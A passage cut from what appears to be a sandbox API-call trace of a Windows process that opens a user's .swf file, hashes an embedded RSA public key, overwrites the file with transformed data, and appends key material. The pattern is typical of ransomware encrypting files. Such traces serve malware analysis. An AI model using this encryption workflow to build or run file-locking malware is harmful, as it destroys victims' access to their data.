(pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\VHfBb-wQEn1 mz0zc.swf") returned=".swf" [0198.449] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\VHfBb-wQEn1 mz0zc.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\vhfbb-wqen1 mz0zc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.450] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=23727) returned 1 [0198.450] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.452] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x5c89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.452] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.455] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.455] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5caf, lpOverlapped=0x0) returned 1 [0198.456] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.456] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.456] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.456] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0198.457] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.457] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.457] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.457] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.457] GetLastError () returned 0x0 [0198.457] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.457] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0198.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.458] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.458] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.458] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5cb0) returned 0x2d51778 [0198.458] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d748 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d790 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5e8 [0198.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5a0 [0198.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.460] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5e8 | out: hHeap=0x6a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5e8 [0198.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0198.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5a0 [0198.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a588 [0198.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0198.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0198.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bfe0 [0198.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0198.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5e8 | out: hHeap=0x6a0000) returned 1 [0198.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.464] GetCurrentThreadId () returned 0x264 [0198.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0198.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c5a0 [0198.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0198.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.465] GetCurrentThreadId () returned 0x264 [0198.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0198.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5e8 [0198.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0198.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5a0 [0198.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a600 [0198.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0198.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5d0 [0198.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5b8 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a618 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5b8 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5d0 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a588 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5e8 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a618 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0198.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0198.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0198.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a600 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d790 | out: hHeap=0x6a0000) returned 1 [0198.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.478] WriteFile (in: hFile=0x52c, lpBuffer=0x2d51778*, nNumberOfBytesToWrite=0x5caa, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d51778*, lpNumberOfBytesWritten=0x30ffb14*=0x5caa, lpOverlapped=0x0) returned 1 [0198.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d51778 | out: hHeap=0x6a0000) returned 1 [0198.479] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x5caf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.479] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.480] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.481] HeapFree 